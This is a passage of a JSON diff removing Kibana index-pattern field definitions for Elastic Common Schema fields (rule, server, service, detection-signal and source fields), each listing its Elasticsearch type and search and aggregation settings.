"scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.license", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.ruleset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.uuid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "rule.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.address", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "server.as.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "server.as.organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "server.as.organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "server.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "server.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "server.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "server.nat.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "server.nat.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "server.packets", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "server.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "server.user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "server.user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "server.user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "server.user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "server.user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.ephemeral_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.node.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.state", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.ancestors.depth", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.ancestors.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.ancestors.index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.ancestors.rule", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.ancestors.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "integer" - ], - "name": "signal.depth", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "integer" - ], - "name": "signal.group.index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.action", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.category", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.original_event.created", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.dataset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.original_event.duration", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.original_event.end", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.kind", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.module", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.original", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.outcome", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.provider", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "signal.original_event.risk_score", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "signal.original_event.risk_score_norm", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.original_event.sequence", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.original_event.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.original_event.start", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.timezone", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.original_event.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.original_time", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.parent.depth", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parent.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parent.index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parent.rule", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parent.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "signal.parents.depth", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parents.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parents.index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parents.rule", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.parents.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.author", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.building_block_type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.rule.created_at", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.created_by", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.enabled", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.false_positives", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.from", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.immutable", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.interval", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.language", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.license", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.max_signals", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "signal.rule.note", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.output_index", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.query", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.references", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "signal.rule.risk_score", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.risk_score_mapping.field", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.risk_score_mapping.operator", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.risk_score_mapping.value", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.rule_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.rule_name_override", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.saved_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.severity_mapping.field", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.severity_mapping.operator", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.severity_mapping.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.severity_mapping.value", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.size", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.tags", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.framework", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.tactic.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.tactic.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.tactic.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.technique.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.technique.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threat.technique.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.threshold.field", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "signal.rule.threshold.value", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.timeline_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.timeline_title", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.timestamp_override", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.to", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "signal.rule.updated_at", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.updated_by", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.rule.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "signal.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "signal.threshold_count", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.address", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "source.as.number", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.as.organization.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "source.as.organization.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "source.as.organization.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "source.bytes", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.city_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.continent_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.country_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.country_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "geo_point" - ], - "name": "source.geo.location", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "geo_point" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "source.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "source.nat.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "source.nat.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "source.packets", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "source.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "source.user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "source.user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - 